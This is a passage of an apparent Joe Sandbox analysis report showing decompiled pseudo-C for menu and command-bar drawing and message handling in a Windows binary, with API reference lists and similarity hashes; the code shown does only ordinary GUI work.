                                                                                                                                                                                                                                                                                          				int _t215;
                                                                                                                                                                                                                                                                                          				long _t234;
                                                                                                                                                                                                                                                                                          				intOrPtr _t235;
                                                                                                                                                                                                                                                                                          				signed int _t238;
                                                                                                                                                                                                                                                                                          				long _t250;
                                                                                                                                                                                                                                                                                          				void* _t252;
                                                                                                                                                                                                                                                                                          				int _t253;
                                                                                                                                                                                                                                                                                          				signed int _t255;
                                                                                                                                                                                                                                                                                          				int _t258;
                                                                                                                                                                                                                                                                                          				signed int _t262;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t121 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t121 ^ _t262;
                                                                                                                                                                                                                                                                                          				_t252 = __ecx;
                                                                                                                                                                                                                                                                                          				_v68 = _a4;
                                                                                                                                                                                                                                                                                          				_t124 =  *(__ecx + 0x10);
                                                                                                                                                                                                                                                                                          				_v76 =  *((intOrPtr*)(__ecx + 0x2c));
                                                                                                                                                                                                                                                                                          				_t255 = _t124 & 0x00000001;
                                                                                                                                                                                                                                                                                          				_v64 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                                                                                                                                                                                          				_t192 = __ecx + 0x1c;
                                                                                                                                                                                                                                                                                          				_v80 = _t124 & 0x00000002;
                                                                                                                                                                                                                                                                                          				_v84 = _t255;
                                                                                                                                                                                                                                                                                          				_v88 = _t124 & 0x00000008;
                                                                                                                                                                                                                                                                                          				if(_t255 != 0) {
                                                                                                                                                                                                                                                                                          					FillRect(_v64, _t192, GetSysColorBrush(0x1d));
                                                                                                                                                                                                                                                                                          					FrameRect(_v64, _t192, GetSysColorBrush(0xd));
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(__ecx + 0xc)) == 2) {
                                                                                                                                                                                                                                                                                          						FillRect(_v64, _t192, GetSysColorBrush(4));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(( *(_v76 + 8) & 0x00000800) == 0) {
                                                                                                                                                                                                                                                                                          					__eflags =  *(_t252 + 8) - 0xffff;
                                                                                                                                                                                                                                                                                          					if( *(_t252 + 8) == 0xffff) {
                                                                                                                                                                                                                                                                                          						_v84 = 0;
                                                                                                                                                                                                                                                                                          						_t255 = _v84;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t132 = _t192->left;
                                                                                                                                                                                                                                                                                          					_t200 = _t192->top;
                                                                                                                                                                                                                                                                                          					_v28.left = _t132;
                                                                                                                                                                                                                                                                                          					_v28.right =  *((intOrPtr*)(_v68 + 0x98)) + _t132;
                                                                                                                                                                                                                                                                                          					_t234 =  *((intOrPtr*)(_v68 + 0x9c)) + _t200;
                                                                                                                                                                                                                                                                                          					_v28.bottom = _t234;
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_v28.top = _t200;
                                                                                                                                                                                                                                                                                          					OffsetRect( &_v28, 0, _t192->bottom - _t200 - _t234 + _t200 - _t234 >> 1);
                                                                                                                                                                                                                                                                                          					__eflags = _v88;
                                                                                                                                                                                                                                                                                          					if(_v88 != 0) {
                                                                                                                                                                                                                                                                                          						_v44.top = _v28.top;
                                                                                                                                                                                                                                                                                          						_v44.left = _v28.left;
                                                                                                                                                                                                                                                                                          						_v44.right = _v28.right;
                                                                                                                                                                                                                                                                                          						_v44.bottom = _v28.bottom;
                                                                                                                                                                                                                                                                                          						InflateRect( &_v44, 0xffffffff, 0xffffffff);
                                                                                                                                                                                                                                                                                          						__eflags = _t255;
                                                                                                                                                                                                                                                                                          						if(_t255 != 0) {
                                                                                                                                                                                                                                                                                          							FillRect(_v64,  &_v44, GetSysColorBrush(4));
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						FrameRect(_v64,  &_v44, GetSysColorBrush(0xd));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t235 = _v76;
                                                                                                                                                                                                                                                                                          					_t141 =  *(_t235 + 0x10);
                                                                                                                                                                                                                                                                                          					_v92 = _t141;
                                                                                                                                                                                                                                                                                          					__eflags = _t141;
                                                                                                                                                                                                                                                                                          					if(_t141 < 0) {
                                                                                                                                                                                                                                                                                          						E00106820( &_v140, 0, 0x30);
                                                                                                                                                                                                                                                                                          						_v140.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          						_t143 = E000F4890(_t192, _t252, _t255);
                                                                                                                                                                                                                                                                                          						__eflags = _t143;
                                                                                                                                                                                                                                                                                          						if(_t143 != 0) {
                                                                                                                                                                                                                                                                                          							_v140.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v140.fMask = 0x18;
                                                                                                                                                                                                                                                                                          						GetMenuItemInfoA( *(_t252 + 0x14),  *(_t252 + 8), 0,  &_v140);
                                                                                                                                                                                                                                                                                          						_t238 = _v88;
                                                                                                                                                                                                                                                                                          						_t203 = _v140.hbmpUnchecked;
                                                                                                                                                                                                                                                                                          						__eflags = _t238;
                                                                                                                                                                                                                                                                                          						if(_t238 != 0) {
                                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                                          							_t148 = _v140.fType >> 0x00000009 & 0x00000001;
                                                                                                                                                                                                                                                                                          							__eflags = _t238;
                                                                                                                                                                                                                                                                                          							if(_t238 != 0) {
                                                                                                                                                                                                                                                                                          								_t203 = _v140.hbmpChecked;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E00102E10( &_v64,  &_v28, _v68, _t255, _v80, _t148, _t203);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags = _t203;
                                                                                                                                                                                                                                                                                          							if(_t203 != 0) {
                                                                                                                                                                                                                                                                                          								goto L23;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t253 = _v68;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t253 = _v68;
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_v72 = _v28.right -  *((intOrPtr*)(_t253 + 0x90)) - _v28.left - _t235 >> 1;
                                                                                                                                                                                                                                                                                          						_t215 = _v72 + _v28.left;
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_t167 = (_v28.bottom -  *((intOrPtr*)(_t253 + 0x94)) - _v28.top - _t235 >> 1) + _v28.top;
                                                                                                                                                                                                                                                                                          						__eflags = _v80;
                                                                                                                                                                                                                                                                                          						_v72 = _t215;
                                                                                                                                                                                                                                                                                          						_v68 = _t167;
                                                                                                                                                                                                                                                                                          						if(_v80 != 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _t255;
                                                                                                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								_t168 = 4;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _v88;
                                                                                                                                                                                                                                                                                          								_t168 = 0x1d;
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t169 = GetSysColorBrush(_t168);
                                                                                                                                                                                                                                                                                          							E00102D30( &_v64, _t253, __eflags,  &_v64, _v92, _t169, _t169, GetSysColorBrush(0x10), _v72, _v68);
                                                                                                                                                                                                                                                                                          							_t255 = _v84;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							ImageList_Draw( *(_t253 + 0x48), _v92, _v64, _t215, _t167, 1);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t151 =  *((intOrPtr*)(_t253 + 0x98));
                                                                                                                                                                                                                                                                                          					_v56 = _t192->top;
                                                                                                                                                                                                                                                                                          					_t193 = _t192->bottom;
                                                                                                                                                                                                                                                                                          					_v52 = _t192->right - _t151;
                                                                                                                                                                                                                                                                                          					_v48 = _t192->bottom;
                                                                                                                                                                                                                                                                                          					_v60 = _t192->left + _t151 + 3;
                                                                                                                                                                                                                                                                                          					SetBkMode(_v64, 1);
                                                                                                                                                                                                                                                                                          					__eflags = _v80;
                                                                                                                                                                                                                                                                                          					if(_v80 == 0) {
                                                                                                                                                                                                                                                                                          						asm("sbb esi, esi");
                                                                                                                                                                                                                                                                                          						_t258 = ( ~_t255 & 0x00000007) + 7;
                                                                                                                                                                                                                                                                                          						__eflags = _t258;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = _t255;
                                                                                                                                                                                                                                                                                          						_t115 = (0 | _t255 != 0x00000000) + 0x10; // 0x10
                                                                                                                                                                                                                                                                                          						_t258 = _t115;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t155 = E00102C90( *((intOrPtr*)(_v76 + 4)), _t253,  &_v64,  &_v60, GetSysColor(_t258));
                                                                                                                                                                                                                                                                                          					__eflags = _v12 ^ _t262;
                                                                                                                                                                                                                                                                                          					return E001059E6(_t155, _t193, _v12 ^ _t262,  &_v64, _t253,  *((intOrPtr*)(_v76 + 4)));
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t250 = _t192->right;
                                                                                                                                                                                                                                                                                          					_v44.left = _t192->left;
                                                                                                                                                                                                                                                                                          					_t194 = _t192->bottom;
                                                                                                                                                                                                                                                                                          					_v44.right = _t250;
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_v44.top = _t192->top + (_t194 - _t192->top - _t250 >> 1);
                                                                                                                                                                                                                                                                                          					_v44.bottom = _t194;
                                                                                                                                                                                                                                                                                          					return E001059E6(DrawEdge(_v64,  &_v44, 6, 2), _t194, _v12 ^ _t262, _t250, _t252, _t255);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}















































                                                                                                                                                                                                                                                                                          0x00102239
                                                                                                                                                                                                                                                                                          0x00102240
                                                                                                                                                                                                                                                                                          0x00102249
                                                                                                                                                                                                                                                                                          0x00102251
                                                                                                                                                                                                                                                                                          0x00102254
                                                                                                                                                                                                                                                                                          0x00102257
                                                                                                                                                                                                                                                                                          0x0010225e
                                                                                                                                                                                                                                                                                          0x00102267
                                                                                                                                                                                                                                                                                          0x0010226a
                                                                                                                                                                                                                                                                                          0x0010226d
                                                                                                                                                                                                                                                                                          0x00102270
                                                                                                                                                                                                                                                                                          0x00102273
                                                                                                                                                                                                                                                                                          0x00102278
                                                                                                                                                                                                                                                                                          0x001022f5
                                                                                                                                                                                                                                                                                          0x00102309
                                                                                                                                                                                                                                                                                          0x0010227a
                                                                                                                                                                                                                                                                                          0x0010227e
                                                                                                                                                                                                                                                                                          0x0010228e
                                                                                                                                                                                                                                                                                          0x0010228e
                                                                                                                                                                                                                                                                                          0x0010227e
                                                                                                                                                                                                                                                                                          0x0010229e
                                                                                                                                                                                                                                                                                          0x00102316
                                                                                                                                                                                                                                                                                          0x0010231a
                                                                                                                                                                                                                                                                                          0x0010231c
                                                                                                                                                                                                                                                                                          0x00102323
                                                                                                                                                                                                                                                                                          0x00102323
                                                                                                                                                                                                                                                                                          0x00102326
                                                                                                                                                                                                                                                                                          0x00102331
                                                                                                                                                                                                                                                                                          0x00102336
                                                                                                                                                                                                                                                                                          0x0010233c
                                                                                                                                                                                                                                                                                          0x0010234a
                                                                                                                                                                                                                                                                                          0x00102350
                                                                                                                                                                                                                                                                                          0x00102353
                                                                                                                                                                                                                                                                                          0x00102359
                                                                                                                                                                                                                                                                                          0x00102362
                                                                                                                                                                                                                                                                                          0x00102368
                                                                                                                                                                                                                                                                                          0x0010236c
                                                                                                                                                                                                                                                                                          0x00102379
                                                                                                                                                                                                                                                                                          0x0010237c
                                                                                                                                                                                                                                                                                          0x00102388
                                                                                                                                                                                                                                                                                          0x0010238b
                                                                                                                                                                                                                                                                                          0x0010238e
                                                                                                                                                                                                                                                                                          0x00102394
                                                                                                                                                                                                                                                                                          0x00102396
                                                                                                                                                                                                                                                                                          0x001023a9
                                                                                                                                                                                                                                                                                          0x001023a9
                                                                                                                                                                                                                                                                                          0x001023c0
                                                                                                                                                                                                                                                                                          0x001023c0
                                                                                                                                                                                                                                                                                          0x001023c6
                                                                                                                                                                                                                                                                                          0x001023c9
                                                                                                                                                                                                                                                                                          0x001023cc
                                                                                                                                                                                                                                                                                          0x001023cf
                                                                                                                                                                                                                                                                                          0x001023d1
                                                                                                                                                                                                                                                                                          0x00102483
                                                                                                                                                                                                                                                                                          0x0010248b
                                                                                                                                                                                                                                                                                          0x00102495
                                                                                                                                                                                                                                                                                          0x0010249a
                                                                                                                                                                                                                                                                                          0x0010249c
                                                                                                                                                                                                                                                                                          0x0010249e
                                                                                                                                                                                                                                                                                          0x0010249e
                                                                                                                                                                                                                                                                                          0x001024b9
                                                                                                                                                                                                                                                                                          0x001024c3
                                                                                                                                                                                                                                                                                          0x001024c9
                                                                                                                                                                                                                                                                                          0x001024cc
                                                                                                                                                                                                                                                                                          0x001024cf
                                                                                                                                                                                                                                                                                          0x001024d1
                                                                                                                                                                                                                                                                                          0x001024d7
                                                                                                                                                                                                                                                                                          0x001024dd
                                                                                                                                                                                                                                                                                          0x001024e0
                                                                                                                                                                                                                                                                                          0x001024e2
                                                                                                                                                                                                                                                                                          0x001024e4
                                                                                                                                                                                                                                                                                          0x001024e4
                                                                                                                                                                                                                                                                                          0x001024f8
                                                                                                                                                                                                                                                                                          0x001024d3
                                                                                                                                                                                                                                                                                          0x001024d3
                                                                                                                                                                                                                                                                                          0x001024d5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001024d5
                                                                                                                                                                                                                                                                                          0x001024fd
                                                                                                                                                                                                                                                                                          0x001023d7
                                                                                                                                                                                                                                                                                          0x001023d7
                                                                                                                                                                                                                                                                                          0x001023ef
                                                                                                                                                                                                                                                                                          0x001023f7
                                                                                                                                                                                                                                                                                          0x001023ff
                                                                                                                                                                                                                                                                                          0x00102402
                                                                                                                                                                                                                                                                                          0x00102407
                                                                                                                                                                                                                                                                                          0x0010240a
                                                                                                                                                                                                                                                                                          0x0010240e
                                                                                                                                                                                                                                                                                          0x00102411
                                                                                                                                                                                                                                                                                          0x00102414
                                                                                                                                                                                                                                                                                          0x00102431
                                                                                                                                                                                                                                                                                          0x00102433
                                                                                                                                                                                                                                                                                          0x00102440
                                                                                                                                                                                                                                                                                          0x00102440
                                                                                                                                                                                                                                                                                          0x00102435
                                                                                                                                                                                                                                                                                          0x00102435
                                                                                                                                                                                                                                                                                          0x00102439
                                                                                                                                                                                                                                                                                          0x0010243e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010243e
                                                                                                                                                                                                                                                                                          0x00102446
                                                                                                                                                                                                                                                                                          0x0010246b
                                                                                                                                                                                                                                                                                          0x00102470
                                                                                                                                                                                                                                                                                          0x00102416
                                                                                                                                                                                                                                                                                          0x00102426
                                                                                                                                                                                                                                                                                          0x00102426
                                                                                                                                                                                                                                                                                          0x00102414
                                                                                                                                                                                                                                                                                          0x00102503
                                                                                                                                                                                                                                                                                          0x0010250b
                                                                                                                                                                                                                                                                                          0x00102511
                                                                                                                                                                                                                                                                                          0x00102516
                                                                                                                                                                                                                                                                                          0x00102523
                                                                                                                                                                                                                                                                                          0x00102526
                                                                                                                                                                                                                                                                                          0x00102529
                                                                                                                                                                                                                                                                                          0x0010252f
                                                                                                                                                                                                                                                                                          0x00102533
                                                                                                                                                                                                                                                                                          0x00102543
                                                                                                                                                                                                                                                                                          0x00102548
                                                                                                                                                                                                                                                                                          0x00102548
                                                                                                                                                                                                                                                                                          0x00102535
                                                                                                                                                                                                                                                                                          0x00102537
                                                                                                                                                                                                                                                                                          0x0010253c
                                                                                                                                                                                                                                                                                          0x0010253c
                                                                                                                                                                                                                                                                                          0x0010253c
                                                                                                                                                                                                                                                                                          0x00102562
                                                                                                                                                                                                                                                                                          0x0010256c
                                                                                                                                                                                                                                                                                          0x00102577
                                                                                                                                                                                                                                                                                          0x001022a0
                                                                                                                                                                                                                                                                                          0x001022a2
                                                                                                                                                                                                                                                                                          0x001022a5
                                                                                                                                                                                                                                                                                          0x001022ab
                                                                                                                                                                                                                                                                                          0x001022b2
                                                                                                                                                                                                                                                                                          0x001022b5
                                                                                                                                                                                                                                                                                          0x001022c3
                                                                                                                                                                                                                                                                                          0x001022cb
                                                                                                                                                                                                                                                                                          0x001022e4
                                                                                                                                                                                                                                                                                          0x001022e4

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000004), ref: 00102282
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 0010228E
                                                                                                                                                                                                                                                                                          • DrawEdge.USER32(?,?,00000006,00000002), ref: 001022CE
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000001D), ref: 001022E9
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 001022F5
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000D), ref: 001022FD
                                                                                                                                                                                                                                                                                          • FrameRect.USER32 ref: 00102309
                                                                                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00102362
                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0010238E
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000004), ref: 0010239A
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 001023A9
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000D), ref: 001023B1
                                                                                                                                                                                                                                                                                          • FrameRect.USER32 ref: 001023C0
                                                                                                                                                                                                                                                                                          • ImageList_Draw.COMCTL32(?,?,?,?,000FC527,00000001,?,?,?,?,000FECC4), ref: 00102426
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000004), ref: 00102446
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000010), ref: 00102450
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00102483
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 001024C3
                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00102529
                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0010254C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Color$BrushRect$Fill$DrawFrame$EdgeImageInflateInfoItemList_MenuModeOffset_memset
                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                          • API String ID: 447778773-3772416878
                                                                                                                                                                                                                                                                                          • Opcode ID: 1b4cd5b0e6a7163a8e74790efc95dfa582a929ec720677046901d138a80a35a3
                                                                                                                                                                                                                                                                                          • Instruction ID: 9db8e0d0b0b53d687afe73ae18b658e82cf10e66a22dea55c3dfeafb1e21b995
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4cd5b0e6a7163a8e74790efc95dfa582a929ec720677046901d138a80a35a3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAC12075E00219DFCB18DFA8D988AEEB7B5FF48310F148119E919A7294DB74AC85CF90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			E00100C90(int __ecx, intOrPtr __esi, signed char _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v28;
                                                                                                                                                                                                                                                                                          				long _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				long _v40;
                                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                                                                                                          				int _v56;
                                                                                                                                                                                                                                                                                          				int _v60;
                                                                                                                                                                                                                                                                                          				int _v64;
                                                                                                                                                                                                                                                                                          				void* _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				struct tagPOINT _v80;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v84;
                                                                                                                                                                                                                                                                                          				int _v88;
                                                                                                                                                                                                                                                                                          				struct tagMSG _v112;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                                                                          				int _t109;
                                                                                                                                                                                                                                                                                          				signed int _t113;
                                                                                                                                                                                                                                                                                          				signed char _t126;
                                                                                                                                                                                                                                                                                          				int _t132;
                                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                                          				void* _t144;
                                                                                                                                                                                                                                                                                          				intOrPtr _t145;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t146;
                                                                                                                                                                                                                                                                                          				int _t161;
                                                                                                                                                                                                                                                                                          				int _t176;
                                                                                                                                                                                                                                                                                          				int _t177;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t178;
                                                                                                                                                                                                                                                                                          				signed int _t179;
                                                                                                                                                                                                                                                                                          				signed int _t180;
                                                                                                                                                                                                                                                                                          				intOrPtr _t181;
                                                                                                                                                                                                                                                                                          				signed int _t182;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t181 = __esi;
                                                                                                                                                                                                                                                                                          				_t94 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t94 ^ _t182;
                                                                                                                                                                                                                                                                                          				_t143 = SendMessageA;
                                                                                                                                                                                                                                                                                          				_v28.left = 0;
                                                                                                                                                                                                                                                                                          				_v28.top = 0;
                                                                                                                                                                                                                                                                                          				_v28.right = 0;
                                                                                                                                                                                                                                                                                          				_v28.bottom = 0;
                                                                                                                                                                                                                                                                                          				_t176 = __ecx;
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 4), 0x41d, __ecx,  &_v28);
                                                                                                                                                                                                                                                                                          				_v80.x = _v28.left;
                                                                                                                                                                                                                                                                                          				_v80.y = _v28.bottom;
                                                                                                                                                                                                                                                                                          				MapWindowPoints( *(__esi + 4), 0,  &_v80, 1);
                                                                                                                                                                                                                                                                                          				MapWindowPoints( *(__esi + 4), 0,  &_v28, 2);
                                                                                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                                                                                                          				_v40 = _v28.top;
                                                                                                                                                                                                                                                                                          				_v44 = _v28.left;
                                                                                                                                                                                                                                                                                          				_v48 = 0x14;
                                                                                                                                                                                                                                                                                          				_v36 = _v28.right;
                                                                                                                                                                                                                                                                                          				_v32 = _v28.bottom;
                                                                                                                                                                                                                                                                                          				_v84 = GetSubMenu( *(__esi + 0x44), _t176);
                                                                                                                                                                                                                                                                                          				_v68 = 0;
                                                                                                                                                                                                                                                                                          				_v64 = 0;
                                                                                                                                                                                                                                                                                          				_v60 = 0;
                                                                                                                                                                                                                                                                                          				_v56 = 0;
                                                                                                                                                                                                                                                                                          				_v52 = 0;
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 4), 0x417, _t176,  &_v68);
                                                                                                                                                                                                                                                                                          				_t109 = _v64;
                                                                                                                                                                                                                                                                                          				_v72 = _t109;
                                                                                                                                                                                                                                                                                          				 *(__esi + 0x88) = _t176;
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 4), 0x403, _t109, 1);
                                                                                                                                                                                                                                                                                          				_t177 = _v72;
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 4), 0x448, _t177, 0);
                                                                                                                                                                                                                                                                                          				if( *0x1719a0 == 0) {
                                                                                                                                                                                                                                                                                          					_t113 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          					_t113 = ( ~(_a4 & 0x000000ff) & 0xffffd000) + 0x4000;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E000FF7B0( &_v48, _v80.y, _t181, _v84, _t113 | 0x00000040, _v80.x);
                                                                                                                                                                                                                                                                                          				SendMessageA( *(_t181 + 4), 0x403, _t177, 0);
                                                                                                                                                                                                                                                                                          				_t178 =  *(_t181 + 4);
                                                                                                                                                                                                                                                                                          				if(GetFocus() != _t178) {
                                                                                                                                                                                                                                                                                          					SendMessageA(_t178, 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t173 =  *(_t181 + 4);
                                                                                                                                                                                                                                                                                          				_t179 = PeekMessageA;
                                                                                                                                                                                                                                                                                          				_v112.hwnd = 0;
                                                                                                                                                                                                                                                                                          				_v112.message = 0;
                                                                                                                                                                                                                                                                                          				_v112.wParam = 0;
                                                                                                                                                                                                                                                                                          				_v112.lParam = 0;
                                                                                                                                                                                                                                                                                          				_v112.time = 0;
                                                                                                                                                                                                                                                                                          				_v112.pt.x = 0;
                                                                                                                                                                                                                                                                                          				_v88 = 0;
                                                                                                                                                                                                                                                                                          				 *(_t181 + 0x88) = 0xffffffff;
                                                                                                                                                                                                                                                                                          				if(PeekMessageA( &_v112,  *(_t181 + 4), 0x201, 0x201, 0) != 0) {
                                                                                                                                                                                                                                                                                          					_t173 = _v112.pt.x;
                                                                                                                                                                                                                                                                                          					_push(_v88);
                                                                                                                                                                                                                                                                                          					if(PtInRect( &_v28, _v112.pt.x) != 0) {
                                                                                                                                                                                                                                                                                          						_t173 =  &_v112;
                                                                                                                                                                                                                                                                                          						PeekMessageA( &_v112,  *(_t181 + 4), 0x201, 0x201, 1);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t180 = _t179 | 0xffffffff;
                                                                                                                                                                                                                                                                                          				if( *(_t181 + 0x8c) == _t180) {
                                                                                                                                                                                                                                                                                          					 *(_t181 + 0x84) =  *(_t181 + 0x84) & 0x000000ef;
                                                                                                                                                                                                                                                                                          					if(( *(_t181 + 0x84) & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t181 + 4), 0x448, _v72, 0);
                                                                                                                                                                                                                                                                                          						return E001059E6(SendMessageA( *(_t181 + 4), 0x449, 1, 0), _t143, _v12 ^ _t182,  *(_t181 + 4), _t180, _t181);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t126 =  *(_t181 + 0x85);
                                                                                                                                                                                                                                                                                          						if((_t126 & 0x00000002) != 0 && (_t126 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          							 *(_t181 + 0x85) = _t126 & 0x000000f7;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						return E001059E6(E00101570(_t181, _t180), _t143, _v12 ^ _t182, _t173, _t180, _t181);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if( *0x1719a4 == 0) {
                                                                                                                                                                                                                                                                                          						_t145 =  *0x17196c; // 0x1719bc
                                                                                                                                                                                                                                                                                          						_t146 = _t145 + 0x10;
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(_t146);
                                                                                                                                                                                                                                                                                          						if( *0x1719a4 == 0) {
                                                                                                                                                                                                                                                                                          							 *0x1719a4 = RegisterWindowMessageA("WTL_CmdBar_InternalAutoPopupMsg");
                                                                                                                                                                                                                                                                                          						}
